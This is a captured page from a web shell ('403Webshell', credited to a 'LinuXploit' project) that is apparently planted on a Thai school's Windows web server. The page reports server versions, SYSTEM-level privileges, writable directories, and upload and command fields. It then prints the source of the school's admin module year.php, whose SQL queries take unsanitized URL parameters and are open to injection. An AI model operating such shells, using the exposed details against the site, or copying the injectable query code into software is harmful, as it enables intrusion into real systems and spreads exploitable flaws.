403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/saithammachan/modules/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/myschool/saithammachan/modules/admin/year.php
	<TABLE cellSpacing=0 cellPadding=0 width=100% height=420 border=0>
      <TBODY>
        <TR>
			<TD>
				<TABLE width="300" align=center cellSpacing=0 cellPadding=0 border=0>
				<TR>
					<TD height="1" class="dotline"></TD>
				</TR>
				<TR>
					<TD>
					<BR><BR>
<?
//////////////////////////////////////////// แสดงรายการ
if($_GET[op] == ""){
?>
 <table width="100%" cellspacing="2" cellpadding="1" >
  <tr bgcolor="#990000" height=25>
   <td align=center><font color="#FFFFFF"><B><CENTER>แก้ไข</CENTER></B></font></td>
   <td align=center><font color="#FFFFFF"><B>ปีงบประมาณ</B></font></td>
  </tr>  
<?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[yearcat] = $db->select_query("SELECT * FROM ".TB_YEAR_CAT." ORDER BY sort ");
$rows[yearcat] = $db->rows($res[yearcat]);

while ($arr[yearcat] = mysql_fetch_array($res[yearcat])){
	$row[sumyearlala] = $db->num_rows(TB_YEAR,"id"," category=".$arr[yearcat][id]." ");

?>
    <tr>
     <td width="50" align=center>
      <a href="?name=admin&file=year&op=tkk6_edit&id=<? echo $arr[yearcat][id];?>"><img src="images/admin/edit.gif" border="0" alt="แก้ไข" ></a> 
     </td> 
     <td align=center><?echo $arr[yearcat][name];?></td>
    </tr>
	<TR>
		<TD colspan="5" height="1" class="dotline"></TD>
	</TR>
<?
 }
$db->closedb ();
?>
 </table>
<?
}

else if($_GET[op] == "tkk6_edit" AND $_GET[action] == "edit"){
	//////////////////////////////////////////// กรณีแก้ไข Database
	if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
		//แก้ไขข้อมูลลงดาต้าเบส
$db->update_db(TB_YEAR_CAT,array(
			"name"=>"".addslashes(htmlspecialchars($_POST[NAME]))."",
			"level"=>"1",
		)," id=".$_GET[id]." ");
		$db->closedb ();
		$ProcessOutput .= "<BR><BR>";
		$ProcessOutput .= "<CENTER><A HREF=\"?name=admin&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
		$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการแก้ไขหมวดหมู่สาระความรู้  เข้าสู่ระบบเรียบร้อยแล้ว</B></FONT><BR><BR>";
		$ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=admin&file=year\">";
		$ProcessOutput .= "</CENTER>";
		$ProcessOutput .= "<BR><BR>";
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "tkk6_edit" AND $_GET[action] == "sort"){
	//////////////////////////////////////////// Set Sort
	if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
			
		//กรณีเลื่อนขึ้น
		if($_GET[move] == "up"){

			$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
			$q[SETD] = "UPDATE ".TB_YEAR_CAT." SET sort = sort+1 WHERE sort = '".$_GET[setsort]."' ";
			$sql[SETD] = mysql_query ( $q[SETD] ) or sql_error ( "db-query",mysql_error() );
			$db->closedb ();

			$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
			$q[SETU] = "UPDATE ".TB_YEAR_CAT." SET sort = '".$_GET[setsort]."' WHERE id = '".$_GET[id]."' ";
			$sql[SETU] = mysql_query ( $q[SETU] ) or sql_error ( "db-query",mysql_error() );
			$db->closedb ();
		}
		if($_GET[move] == "down"){
		
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
			$q[SETD] = "UPDATE ".TB_YEAR_CAT." SET sort = sort-1 WHERE sort = '".$_GET[setsort]."' ";
			$sql[SETD] = mysql_query ( $q[SETD] ) or sql_error ( "db-query",mysql_error() );
			$db->closedb ();

			$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
			$q[SETU] = "UPDATE ".TB_YEAR_CAT." SET sort = '".$_GET[setsort]."' WHERE id = '".$_GET[id]."' ";
			$sql[SETU] = mysql_query ( $q[SETU] ) or sql_error ( "db-query",mysql_error() );
			$db->closedb ();
		}
		$ProcessOutput .= "<BR><BR>";
		$ProcessOutput .= "<CENTER><A HREF=\"?name=admin&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
		$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการแก้ไขหมวดหมู่กิจกรรม  เข้าสู่ระบบเรียบร้อยแล้ว</B></FONT><BR><BR>";
		$ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=admin&file=year\">";
		$ProcessOutput .= "</CENTER>";
		$ProcessOutput .= "<BR><BR>";
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "tkk6_edit"){
	//////////////////////////////////////////// กรณีแก้ไข Form
	if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
		//ดึงค่า
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='".$_GET[id]."' ");
		$arr[user] = $db->fetch($res[user]);
		$res[category] = $db->select_query("SELECT * FROM ".TB_YEAR_CAT."");
		$arr[category] = $db->fetch($res[category]);
		$db->closedb ();
?>
<FORM NAME="form1"METHOD=POST ACTION="?name=admin&file=year&op=tkk6_edit&action=edit&id=<?=$_GET[id];?>">
<TR>
<TD>
<B>ปีงบประมาณ :</B>
</TD>
<TD>
<INPUT TYPE="text" NAME="NAME" size="10" value="<?=$arr[category][name];?>"> 
</TD>
<TD>
<INPUT TYPE="submit" value=" บันทึกแก้ไข ">
</TD>
</FORM>

<?
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
?>
						<BR><BR>
					</TD>
				</TR>
			</TABLE>
			<BR><BR>
			<!-- Admin -->
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit